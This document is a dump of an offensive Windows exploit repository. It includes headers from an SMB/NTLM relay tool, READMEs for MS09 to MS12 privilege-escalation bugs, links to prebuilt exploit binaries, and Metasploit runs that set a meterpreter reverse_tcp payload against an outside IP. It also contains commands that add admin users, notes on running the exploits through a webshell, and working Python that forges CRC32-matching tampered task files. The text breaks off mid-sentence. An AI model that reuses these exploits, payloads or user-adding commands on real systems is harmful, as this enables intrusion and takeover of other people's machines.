#ifndef _MISC_FUNCTIONS_H_
#define _MISC_FUNCTIONS_H_
#define _CRT_SECURE_NO_DEPRECATE

#include

#pragma pack(1)
#ifdef WIN32
#include
#include
#else
#pragma align 1
#include
#include
#include
#include
#include
#include
#include
#include //pthread
#include //toupper
#include
#include
#define SOCKET int
#define _strnicmp strncasecmp
#define closesocket close
#define Sleep(a) sleep(a/1000)
#define INVALID_SOCKET -1
#endif
//#include "smbrelay.h"
#include "ntlm.h"

/* One relayed connection: the inbound (source) socket and the outbound (destination) socket */
typedef struct
{
    SOCKET source;
    struct sockaddr_in sourceaddr;

    SOCKET destination;
    struct sockaddr_in destinationaddr;

    int dstProtocol;
    char hostname[256];
} RELAY;

#define CONNECT_TIMEOUT 10
#define SMBWAITTIMEOUT 5
#define DBG_DUMP_ROWS 16


void DumpMem(void* string, int length);
char *ReadFileToSend(int *BackdoorFileSize, char *lpBackdoorFile);

int ConnectToRemoteHost(RELAY *relay, char *hostname, int port);
//int SendBytesAndWaitForResponse(RELAY *relay,char *source, int nBytes, char *destination, int MaxReadSize,int timeout);
int SendBytesAndWaitForResponse(SOCKET destination, char *source, int nBytes, char *destinationBuffer, int MaxReadSize, int timeout);
void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress, unsigned char *challenge);
void CleanLine(int verbose);
void usage(void);
void Banner(void);

#endif

-------------------------------------------------------------------------------- /MS08-068/src/payload.h:
--------------------------------------------------------------------------------
#ifndef _PAYLOAD_
#define _PAYLOAD_
#include "smbrelay.h"
#include "smb.h"
#include "ntlm.h"

void CleanLine(int verbose);
smheader *BuildSmbPacket1(void);
smheader *GetSmbPacket2(RELAY *relay, smheader* Packet1);
smheader *GetSmbPacket3(smheader* SmbPacket2, char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3);
smheader *GetSmbPacket3Alt(smheader* SmbPacket2, char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3);

int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName);
char *GenerateFTPTransfer(char *buffer, char *host, int port, char *username, char *password, char *downloadfile, char *optionalparameter);
int AttackWeakServices(RELAY relay, char *buf, char *path, uint16 FID, char *ServicePath);


#endif

-------------------------------------------------------------------------------- /MS08-068/src/pop3relay.h: --------------------------------------------------------------------------------
#ifndef _POP3_RELAY_
#define _POP3_RELAY_

#include "smbrelay.h"

int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname, int destinationport);

#endif
-------------------------------------------------------------------------------- /MS08-068/src/smbrelay.h: --------------------------------------------------------------------------------
#ifndef _SMBRELAY_H_ /* the original tested _SBMRELAY_H_ (typo), so the include guard never took effect */
#define _SMBRELAY_H_

#define _CRT_SECURE_NO_DEPRECATE
#include
#ifdef WIN32
#include
#define socklen_t int
#endif
#include "misc.h"
#include "smb.h"
#include "ntlm.h"


/* Offsets of the embedded NTLMSSP blob inside an SMB Session Setup AndX packet */
#define GetNTLMPacketFromSmbPacket(a) ((char*)a+0x2b+4)
#define GetNTLMPacket3FromSmbPacket(a) ((char*)a+ sizeof(smheader) -sizeof(((smheader*)a)->buffer) +sizeof(SessionSetupAndX))

/* NetBIOS session header: big-endian message length plus the 4-byte header itself */
#define SmbPacketLen(a) (SREV(a->SmbMessageLength)+4)
//#define PrintErrorMessage(a) printf("%s",a); return(0);
//#define PrintErrorMessage(a) printf(a); return(0);

#define ATTACK_NONE 0x00
#define REPLAY_HTTP 0x01
#define REPLAY_SMB 0x02
#define REPLAY_POP3 0x03
#define REPLAY_IMAP 0x04
#define REPLAY_SMTP 0x05
#define REPLAY_DNS 0x06
#define REPLAY_TELNET 0x07
#define REPLAY_MSSQL 0x08

#define PSEXEC 0x10

#define debug (verbose==2)



//Functions
//int InitSmbHandshake(RELAY *relay,char *Buffer, int BufferSize);
int HandleIncommingSmbRequest(RELAY *relay, char *destinationhostname, int destinationport);

int ReplayAttackAgainst(int Protocol, char *hostname, int port);
int StablishNTLMSession(RELAY relay, char *host, char *lpUserName, char *lpPassword);
int ExecuteCode(RELAY relay);




#endif
-------------------------------------------------------------------------------- /MS08-068/src/smtprelay.h: --------------------------------------------------------------------------------
#ifndef _SMTP_RELAY_
#define _SMTP_RELAY_

#include "smbrelay.h"

int HandleIncommingSMTPRequest(RELAY *relay, char *destinationhostname, int destinationport);

#endif
-------------------------------------------------------------------------------- /MS09-012/Chimichurri/Chimichurri.sln: --------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 8.00
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Chimichurri", "Chimichurri.vcproj", "{94A3EC47-DAA8-4CBD-8E65-4923F764C659}"
	ProjectSection(ProjectDependencies) = postProject
	EndProjectSection
EndProject
Global
	GlobalSection(SolutionConfiguration) = preSolution
		Debug = Debug
		Release = Release
	EndGlobalSection
	GlobalSection(ProjectConfiguration) = postSolution
		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.ActiveCfg = Debug|Win32
		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Debug.Build.0 = Debug|Win32
		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.ActiveCfg = Release|Win32
		{94A3EC47-DAA8-4CBD-8E65-4923F764C659}.Release.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
	EndGlobalSection
	GlobalSection(ExtensibilityAddIns) = postSolution
	EndGlobalSection
EndGlobal
-------------------------------------------------------------------------------- /MS09-012/Chimichurri/ReadMe.txt: --------------------------------------------------------------------------------
========================================================================
    CONSOLE APPLICATION : Uroboros2 Project Overview
========================================================================

AppWizard has created this Uroboros2 application for you.
This file contains a summary of what you will find in each of the files that
make up your Uroboros2 application.


Uroboros2.vcproj
    This is the main project file for VC++ projects generated using an Application Wizard.
    It contains information about the version of Visual C++ that generated the file, and
    information about the platforms, configurations, and project features selected with the
    Application Wizard.

Uroboros2.cpp
    This is the main application source file.

/////////////////////////////////////////////////////////////////////////////
Other standard files:

StdAfx.h, StdAfx.cpp
    These files are used to build a precompiled header (PCH) file
    named Uroboros2.pch and a precompiled types file named StdAfx.obj.

/////////////////////////////////////////////////////////////////////////////
Other notes:

AppWizard uses "TODO:" comments to indicate parts of the source code you
should add to or customize.

/////////////////////////////////////////////////////////////////////////////
-------------------------------------------------------------------------------- /MS09-012/Chimichurri/stdafx.cpp: --------------------------------------------------------------------------------
// stdafx.cpp : source file that includes just the standard includes
// Uroboros2.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file
-------------------------------------------------------------------------------- /MS09-012/Chimichurri/stdafx.h: --------------------------------------------------------------------------------
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//

#pragma once
#include
#include
#include

// TODO: reference additional headers your program requires here
-------------------------------------------------------------------------------- /MS09-012/README.md: --------------------------------------------------------------------------------
# MS09-012

MS09-012


Vulnerability reference:
* [MS09-012](https://technet.microsoft.com/library/security/ms09-012)
* [CVE-2009-0079](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0079)

## Usage
```
/xxoo/-->Usage: pr.exe command
```
![pr](pr.png)
![churrasco](churrasco.png)

## References
[Token Kidnapping's Revenge](https://media.blackhat.com/bh-us-10/whitepapers/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping's-Revenge-wp.pdf)

## Thanks
Thanks to ***sam rou***
-------------------------------------------------------------------------------- /MS09-020/README.md: --------------------------------------------------------------------------------
# MS09-020
```
The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms,
and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI,
as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder,
aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122.
```

Vulnerability reference:
* [MS09-020](https://technet.microsoft.com/library/security/ms09-020)
* [CVE-2009-1535](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535)

Usage:
```
iis6.0.exe command
```
![iis6](iis6.0.png)

## load the module within the Metasploit
[msf judgment](https://www.rapid7.com/db/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass)
```
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > show actions
...actions...
msf auxiliary(dir_webdav_unicode_bypass) > set ACTION
msf auxiliary(dir_webdav_unicode_bypass) > show options
...show and set options...
msf auxiliary(dir_webdav_unicode_bypass) > run
```
```
msf auxiliary(webdav_scanner) > run

[+] 192.168.16.136 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
-------------------------------------------------------------------------------- /MS09-050/README.md: --------------------------------------------------------------------------------
# MS09-050

```
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista,
Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2.
Windows Vista without SP1 does not seem affected by this flaw.
```

Vulnerability reference:
* [MS09-050](https://technet.microsoft.com/library/security/ms09-050)
* [CVE-2009-2532](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2532)

## Usage
```
msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102
msf exploit(ms09_050_smb2_negotiate_func_index) > run
```

## load the module within the Metasploit console
[msf](https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index)
```
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show targets
...targets...
msf exploit(ms09_050_smb2_negotiate_func_index) > set TARGET
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
...show and set options...
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
```

## References
[MS09-050 vulnerability test](http://edu.aqniu.com/group/30/thread/107)
[MS09-050 vulnerability](https://www.youtube.com/watch?v=cytEOUQ6QsI)

-------------------------------------------------------------------------------- /MS10-012/README.md: --------------------------------------------------------------------------------
# MS10-012
```
This security update resolves one publicly disclosed and several privately reported vulnerabilities in Microsoft Windows.
The vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request.
To exploit these vulnerabilities, an attacker must convince the user to initiate an SMB connection to a specially crafted SMB server.
```

Vulnerability reference:
* [MS10-012](https://technet.microsoft.com/library/security/ms10-012)
* [exp-db](https://www.exploit-db.com/exploits/12273/)
* [SMB Pathname Overflow Vulnerability - CVE-2010-0020](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0020)
* [SMB Memory Corruption Vulnerability - CVE-2010-0021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0021)
* [SMB Null Pointer Vulnerability - CVE-2010-0022](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0022)
* [SMB NTLM Authentication Lack of Entropy Vulnerability - CVE-2010-0231](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0231)

-------------------------------------------------------------------------------- /MS10-015/README.md: --------------------------------------------------------------------------------
# MS10-015

```
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy.
If the session in use is already elevated then the exploit will not run.
The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
```
- The POC was from [@Offensive Security](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip)

Vulnerability reference:
* [MS10-015](https://technet.microsoft.com/en-us/library/security/ms10-015.aspx)
* [CVE-2010-0232](https://www.exploit-db.com/exploits/11199/)

## Usage
```
c:\> vdmallowed.exe
```

![win2003](win2003.png)

## load the module within the Metasploit console
```
msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET
msf exploit(ms10_015_kitrap0d) > show options
...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit
```

# Reference
- [http://www.7kb.org/520.html](http://www.7kb.org/520.html)

-------------------------------------------------------------------------------- /MS10-048/README.md: --------------------------------------------------------------------------------
# MS10-048
```
The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3,
Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument,
which allows local users to cause a denial of service (system hang) via a crafted application,
aka "Win32k Bounds Checking Vulnerability."
```
The text above describes the denial-of-service issue from this bulletin; MS10-048 itself is an elevation-of-privilege bulletin that fixed several win32k.sys issues at once.

Vulnerability reference:
* [MS10-048](https://technet.microsoft.com/library/security/ms10-048)
* [CVE-2010-1887](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1887)

## Usage
```
c:\> x86.exe
```
The binaries shipped in this directory are `ms10048/ms10048.exe` (x86) and `ms10048/ms10048X64.exe` (x64).

![2003](2003.png)

## References
* [Privilege escalation exploit on Windows x64 (Chinese)](https://www.secpulse.com/archives/1597.html)

--------------------------------------------------------------------------------
/MS10-048/ms10048/ms10048.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-048/ms10048/ms10048.exe
--------------------------------------------------------------------------------
/MS10-048/ms10048/ms10048X64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-048/ms10048/ms10048X64.exe
--------------------------------------------------------------------------------
/MS10-059/Churraskito_exe.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-059/Churraskito_exe.zip
--------------------------------------------------------------------------------
/MS10-059/MS10-059.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-059/MS10-059.exe
--------------------------------------------------------------------------------
/MS10-059/README.md:
--------------------------------------------------------------------------------
# MS10-059
```
Some Windows applications use the Tracing feature to record debugging information. A Windows process that uses
Tracing keeps watching the relevant registry subkeys and re-reads a value as soon as it changes. One of these
values, FileDirectory, holds a Windows directory name. The registry keys grant the Users group Set Value
permission, so any authenticated user can write arbitrary values there. A local user who holds the impersonate
privilege can, when a service running as Local System connects to a pipe, impersonate Local System (or another
privileged account such as Administrator) and so elevate privileges.
```

Vulnerability reference:
* [MS10-059](https://technet.microsoft.com/library/security/ms10-059)
* [CVE-2010-2554](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2554)

## Usage
```
c:\> Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
```

## References
[Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)

--------------------------------------------------------------------------------
/MS10-065/MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-065/MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip
--------------------------------------------------------------------------------
/MS10-065/README.md:
--------------------------------------------------------------------------------
# MS10-065
```
Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services
(IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request,
related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability."
```

Vulnerability reference:
* [MS10-065](https://technet.microsoft.com/library/security/ms10-065)
* [CVE-2010-1899](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1899)
* [exp-db](https://www.exploit-db.com/exploits/15167/)

## load the module within the Metasploit
[msf](https://www.rapid7.com/db/modules/AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS)
```
msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show actions
...actions...
msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION
msf auxiliary(ms10_065_ii6_asp_dos) > show options
...show and set options...
msf auxiliary(ms10_065_ii6_asp_dos) > run
```
--------------------------------------------------------------------------------
/MS10-092/Enviroment/FoxitReader411_enu_Setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-092/Enviroment/FoxitReader411_enu_Setup.exe
--------------------------------------------------------------------------------
/MS10-092/README.md:
--------------------------------------------------------------------------------
# MS10-092
- Windows Task Scheduler Privilege Escalation
```
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.
Also, in a default configuration, normal users can read and write the task files that they have created.
By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
NOTE: Thanks to webDEViL for the information about disable/enable.
```
- The exp was from [@webDEViL](https://www.exploit-db.com/author/?a=587)

Vulnerability reference:
* [MS10-092](https://technet.microsoft.com/library/security/ms10-092)
* [CVE-2010-3338](https://www.exploit-db.com/exploits/15589/)
* [Task Scheduler '.XML' Privilege Escalation](https://www.exploit-db.com/exploits/19930/)

## Usage
[MS10-092-YouTube](https://www.youtube.com/watch?v=gd-F1dlWBAw)

## load the module within the Metasploit
[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_092_schelevator)
```
msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
...targets...
msf exploit(ms10_092_schelevator) > set TARGET
msf exploit(ms10_092_schelevator) > show options
...show and set options...
msf exploit(ms10_092_schelevator) > exploit
```
--------------------------------------------------------------------------------
/MS11-011/MS11-011.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-011/MS11-011.exe
--------------------------------------------------------------------------------
/MS11-011/README.md:
--------------------------------------------------------------------------------
# MS11-011

```
Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys: a local user who stores a crafted
REG_BINARY value in the SystemDefaultEUDCFont registry key can overflow a kernel stack buffer and gain privileges.
```

Vulnerability reference:
* [MS11-011](https://technet.microsoft.com/library/security/ms11-011)
* [CVE-2010-4398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398)

## References
[MS11-011 vulnerability analysis (pediy, Chinese)](http://bbs.pediy.com/thread-130434.htm)

--------------------------------------------------------------------------------
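The MS10-092 entry above says the Task Scheduler checks a task file only by its CRC32, so a tampered file passes as long as its CRC32 is brought back to the original value. The following added example (not code from this repository or from the schelevator module) shows the arithmetic behind that: given a modified file and the CRC32 of the original, it computes four bytes which, appended to the modified file, make its CRC32 equal to the original's. The task XML below is a constructed stand-in, not a real Task Scheduler file, and where such bytes could be hidden inside a file that the XML parser still accepts is not shown.

```python
"""CRC32 fix-up: give a modified file the CRC32 of the original.

Added example for the MS10-092 entry; not code from this repository or from
the Metasploit schelevator module. Only the CRC32 arithmetic is shown; the
task XML is a constructed stand-in, not a real Task Scheduler file.
"""
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial (the one zlib uses)


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every table entry has a distinct high byte; that is what lets the byte
# update step be run backwards, one byte at a time.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(TOP_BYTE_TO_INDEX) == 256


def _update(reg, byte):
    """One byte of the table-driven CRC-32 update on the raw register."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def crc32_patch(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes p with crc32_of(data + p) == target_crc."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # raw register after `data`
    want = target_crc ^ 0xFFFFFFFF        # raw register that yields target_crc
    # Run the last four update steps backwards from `want` to find which
    # table index each step must hit. After four bytes the earlier register
    # has been shifted out entirely, so `want` alone determines the indices.
    indices = []
    r = want
    for _ in range(4):
        k = TOP_BYTE_TO_INDEX[r >> 24]
        indices.append(k)
        r = ((r ^ TABLE[k]) << 8) & 0xFFFFFFFF
    indices.reverse()                     # first appended byte first
    # Forward pass: choose each byte so (reg ^ byte) & 0xFF is the index.
    patch = bytearray()
    for k in indices:
        b = (reg ^ k) & 0xFF
        patch.append(b)
        reg = _update(reg, b)
    assert reg == want
    return bytes(patch)


def crc32_of(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_task(original: bytes, modified: bytes) -> bytes:
    """Append a fix-up so `modified` carries the same CRC32 as `original`."""
    return modified + crc32_patch(modified, crc32_of(original))


def crc_matches(original: bytes, modified: bytes) -> bool:
    """True if the forged file would pass a check that only compares CRC32s."""
    return crc32_of(forge_task(original, modified)) == crc32_of(original)


# Constructed stand-in for a task file: the command is the field an attacker
# would change, and CRC32 is the only integrity check (per MS10-092).
ORIGINAL = b"<Task><Actions><Exec><Command>notepad.exe</Command></Exec></Actions></Task>"
MODIFIED = b"<Task><Actions><Exec><Command>cmd.exe /c net user x x /add</Command></Exec></Actions></Task>"

if __name__ == "__main__":
    forged = forge_task(ORIGINAL, MODIFIED)
    print("original crc32 : %08x" % crc32_of(ORIGINAL))
    print("forged   crc32 : %08x (fix-up bytes %s)" % (crc32_of(forged), forged[-4:].hex()))
```

The fix-up works because CRC32 is linear and the last four input bytes fully determine the final register regardless of what came before; any checksum with that property is a tamper-evidence mechanism only against accidents, which is the lesson of MS10-092.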
/MS11-046/2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/2003.png
--------------------------------------------------------------------------------
/MS11-046/2003_k8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/2003_k8.png
--------------------------------------------------------------------------------
/MS11-046/MS11_46_k8.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/MS11_46_k8.exe
--------------------------------------------------------------------------------
/MS11-046/README.md:
--------------------------------------------------------------------------------
# MS11-046

```
The Ancillary Function Driver (AFD) supports Windows sockets applications and is contained in the afd.sys file.
The afd.sys driver runs in kernel mode and manages the Winsock TCP/IP communications protocol. An elevation of
privilege vulnerability exists where the AFD improperly validates input passed from user mode to the kernel.
An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability.
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode
(i.e. with NT AUTHORITY\SYSTEM privileges).
```
- The exp was from [@Tomislav Paskalev](https://www.exploit-db.com/author/?a=7919)

Vulnerability reference:
* [MS11-046](https://technet.microsoft.com/library/security/ms11-046)
* [CVE-2011-1249](https://www.exploit-db.com/exploits/40564/)

## Usage
```
c:\> MS11-046.exe
```
Run through the caidao (China Chopper) webshell:
![2003_k8](2003_k8.png)
Windows Server 2003, local console:
![2003](2003.png)
Windows 7 x86:
![win7](win7.png)

--------------------------------------------------------------------------------
/MS11-046/ms11-046.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/ms11-046.exe
--------------------------------------------------------------------------------
/MS11-046/win7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/win7.png
--------------------------------------------------------------------------------
/MS11-062/40627.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/40627.exe
--------------------------------------------------------------------------------
/MS11-062/MS11-062.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/MS11-062.exe
--------------------------------------------------------------------------------
/MS11-062/README.md:
--------------------------------------------------------------------------------
# MS11-062

```
An elevation of privilege vulnerability exists in the NDISTAPI.sys component of the
Remote Access Service NDISTAPI driver. The
vulnerability is caused when the NDISTAPI
driver improperly validates user-supplied input when passing data from user mode
to the Windows kernel. An attacker must have valid logon credentials and be able
to log on locally to exploit the vulnerability. An attacker who successfully
exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).
```
- The exp was from [@Tomislav Paskalev](https://www.exploit-db.com/author/?a=7919)

Vulnerability reference:
* [MS11-062](https://technet.microsoft.com/library/security/ms11-062)
* [CVE-2011-1974](https://www.exploit-db.com/exploits/40627/)

## Usage
The exploit talks to the NDISTAPI driver, which is only loaded while the **Routing and Remote Access** service is running, so it only works on a host where an administrator has enabled that service:
![start_service](service_st.png)

```
c:\> MS11-062.exe
```

![win2003](win2003.png)

--------------------------------------------------------------------------------
/MS11-062/service_st.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/service_st.png
--------------------------------------------------------------------------------
/MS11-062/win2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/win2003.png
--------------------------------------------------------------------------------
/MS11-080/2003_k8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/2003_k8.png
--------------------------------------------------------------------------------
/MS11-080/MS11_80_k8.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/MS11_80_k8.exe
--------------------------------------------------------------------------------
/MS11-080/README.md:
--------------------------------------------------------------------------------
# MS11-080
```
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space.
An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile,
will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another
SYSTEM process before restoring its own token to avoid causing system instability.
```
- The exp was from [@BHaFSec](http://www.bhafsec.com/files/windows/ms11-080.exe)

Vulnerability reference:
* [MS11-080](https://technet.microsoft.com/library/security/ms11-080)
* [CVE-2011-2005](https://www.exploit-db.com/exploits/18176/)

## Usage
`-O` selects the target OS (`2k3` here):
```
c:\> ms11-080.exe -O 2k3
c:\> ms11-080-AddUser.exe -O 2k3
[*] Adding Admin User:hacker Pass:Hacked!...
```
Adding the user through the caidao (China Chopper) webshell:
![win2003_k8team](2003_k8.png)
Windows Server 2003, local console:
![win2003](win2003.png)
Windows 7:
![win7](win7.jpg)

## load the module within the msf
- [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms11_080_afdjoinleaf)
```
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET
msf exploit(ms11_080_afdjoinleaf) > show options
...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit
```

--------------------------------------------------------------------------------
/MS11-080/ms11-080-AddUser.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/ms11-080-AddUser.exe
--------------------------------------------------------------------------------
/MS11-080/ms11-080.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/ms11-080.exe
--------------------------------------------------------------------------------
/MS11-080/win2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/win2003.png
--------------------------------------------------------------------------------
/MS11-080/win7.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/win7.jpg
--------------------------------------------------------------------------------
/MS12-020/MS12-020.rb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020.rb
--------------------------------------------------------------------------------
/MS12-020/MS12-020KB2621440-CVE-2012-0002.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020KB2621440-CVE-2012-0002.rar
--------------------------------------------------------------------------------
/MS12-020/MS12-020检测.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020检测.zip
--------------------------------------------------------------------------------
/MS12-020/README.md:
--------------------------------------------------------------------------------
# MS12-020

Blue Screen of Death
```
Port: 3389
Remote Desktop Protocol (RDP) denial-of-service vulnerability (MS12-020)
```
MS12-020 is a flaw in the RDP implementation (a freed or uninitialised object is used) that Microsoft rated as
